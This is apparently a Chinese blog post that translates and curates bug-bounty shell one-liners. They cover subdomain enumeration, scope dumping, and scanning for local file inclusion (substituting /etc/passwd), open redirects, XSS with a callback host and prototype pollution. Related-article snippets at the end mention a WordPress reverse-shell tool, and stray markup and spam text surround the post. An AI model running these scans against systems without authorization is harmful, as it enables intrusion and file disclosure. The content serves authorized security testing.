<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    在挖洞的時候一些提高效率的命令

    一顆小胡椒2022-05-01 22:33:57

    原文地址;

    https://github.com/dwisiswant0/awesome-oneliner-bugbounty

    定義

    本節定義了整個單行命令/腳本中使用的特定術語或占位符。

      1.1. "HOST "定義了一個主機名、(子)域或IP地址,例如,用internal.host、domain.tld、sub.domain.tld或127.0.0.1取代。

      1.2. "HOSTS.txt "包含標準1.1,在文件中超過一個。

      2.1. "URL "肯定定義了URL,例如被http://domain.tld/path/page.html,或者有點以HTTP/HTTPS協議開始。

      2.2. 2.2. "URLS.txt "包含標準2.1,在文件中不止一個。

      3.1. "FILE.txt "或 "FILE{N}.txt "是指根據上下文和需要運行命令/腳本所需的文件。

      4.1. "OUT.txt "或 "OUT{N}.txt "是指作為目標存儲結果的文件將是被執行的命令。

    本地文件包含 @dwisiswant0

    gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'
    

    開放式重定向 @dwisiswant0

    export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'
    

    @N3T_hunt3r

    cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null
    

    XSS @cihanmehmet

    gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt
    

    @fanimalikhack

    waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt
    

    @oliverrickfors

    cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")"
    

    原型鏈污染@R0X4R

    subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE"
    

    查找 JavaScript 文件 @D0cK3rG33k

    assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url" "\e[1;32m$vars"; done
    

    從JavaScript中提取端點@renniepak

    cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"http://' -e 's/"$//' | sort -u
    

    從目標列表中獲取CIDR和組織信息@steve_mcilwain


    for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; done | uniq); done
    

    從RapidDNS.io獲取子域名@andirrahmani1

    curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep " | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u
    

    從BufferOver.run獲取子域@_ayoubfathi_

    curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u
    

    @AnubhavSingh_

    export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain"
    

    從Riddler.io獲取子域名@pikpikcu

    curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
    

    Get Subdomains from VirusTotal@pikpikcu

    curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
    

    用cyberxplore獲取子域名@pikpikcu

    curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" 
    

    從CertSpotter獲取子域@caryhooper

    curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
    

    從Archive中獲取子域@pikpikcu

    curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u
    

    從JLDC獲取子域@pikpikcu

    curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u
    

    從securitytrails獲取子域@pikpikcu

    curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u
    

    Bruteforcing Subdomain using DNS Over@pikpikcu

    while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent  | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt
    

    FFUF 的子域暴力破解器 @GochaOqradze 

    ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}'
    

    從 IP 地址查找 ASN 的分配 IP 范圍 wains.be 

    whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n
    

    從文件中提取 IP @emenalf 

    grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt
    

    查找子域接管 

    subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;
    

    使用 cURL + Parallel 進行 URL 探測 

    cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t  Size:%{size_download}\t %{url_effective}' -o /dev/null -skw
    

    我個人覺得很有用的來了,注意哈。上面并不全,全的在原文,我翻譯過來后,篩出來適合咱用的一些命令

    轉儲范圍內的資產 chaos-bugbounty-list@dwisiswant0 

    curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value'
    

    轉儲范圍內的資產 bounty-targets-data

    HackerOne 程序 

    curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'
    

    BugCrowd 程序 

    curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'
    

    還有一些,在原文,hackerone的資產是每小時更新的可以進行差異化對比來獲取到新的項目資產范圍

    從swagger.json提取端點 @zer0pwn 最常用的語句了

    curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]'
    

    查找隱藏的服務器和/或管理面板 這個依托與字典了

    ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt
    

    在你們用這些工具的時候最好開一臺服務器來配置你們的工具環境變量,我用的centos缺什么從yum拉取或者你已經配置好了工具保證你的命令能夠調用的到比如前面的subfinder,ffuf 不然的話會報錯的,其余的命令看原文吧,重復利用的比較少

    原文地址;

    https://github.com/dwisiswant0/awesome-oneliner-bugbounty

    侵權聯系刪除

    又到了我發牢騷的時候了,挖了一個月的hackerone,哇,重復率高達99%,或許是我太菜了,昨天的一個功能點的SQL注入都被忽略,直接懵逼,今天早上復測了一下發現跑不開了,我??????????又是朝著粉絲大佬們努力的一天

    太菜了太菜了太菜了,菜到自閉兄弟們,順便兄弟們勞動節快樂

    hostcurl
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    神兵利器 - presshell
    2022-07-27 17:42:09
    您還可以使用ip和port參數打開反向 shell。為了方便,還提供了一個選項,可以無條件地將文件上傳到插件的目錄,而無需檢查。對公共或私人服務器進行未經授權的攻擊是非法的。
    knative的實踐(一)
    2022-01-23 15:14:14
    參考的是人家的github項目,因為這個項目里的安裝模板用的是國內可訪問的容器鏡像安裝源,直接用knativ
    這里根據紅日安全PHP-Audit-Labs對一些函數缺陷的分析,從PHP內核層面來分析一些函數的可利用的地方,標題所說的函數缺陷并不一定是函數本身的缺陷,也可能是函數在使用過程中存在某些問題,造成了漏洞,以下是對部分函數的分析
    訪問http://ip:9200 檢查elasticsearch是否正常啟動NO.2 安裝kibanaapt-get install kibanaserver.host: "ip"service elasticsearch start
    靶機Bitlab的滲透測試
    2023-03-22 10:13:58
    0x00 本文目錄反思與總結基本信息滲透測試過程補充0x01 反思與總結1.?發送GET參數化請求2.?對反彈回來的shell進行設置完善3.?hooks來進行提權0x02 基本信息靶機IP地址:10.10.10.114Kali IP地址:10.10.14.130x03 滲透測試過程端口探測。22端口目錄探測我們先從80下手,查看下網頁內容先使用gobuster進行掃描。時,發現沒反應,但是出現了javascript代碼。
    5.8.1 RCE漏洞
    2021-10-05 19:21:38
    在include\common.func.php文件中的ShowMsg函數存在模板注入$gourl = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; 從Referer頭中取值,然后進行渲染,造成RCE
    DerpnStink靶場
    2023-01-12 11:40:41
    DerpnStink信息收集使用nmap進行深度掃描,發現開放了21和22端口,以及80端口,80端口為wordpress應用,存在wordpress登陸apiNmap scan report for 10.0.3.4
    從 UPnProxy 易受攻擊的設備中創建 SOCKS 代理服務器的工具
    在cgiHandler函數中,將用戶的HTTP請求參數作為環境變量,通過諸如LD_PRELOAD即可劫持進程的動態鏈接庫,實現遠程代碼執行。代碼首先拼接出用戶請求的cgi完整路徑并賦予cgiPath,然后檢查此文件是否存在以及是否為可執行文件。隨后代碼將cgiPath、envp、stdIn與stdOut作為參數傳入launchCgi函數中。
    一顆小胡椒
    暫無描述
      亚洲 欧美 自拍 唯美 另类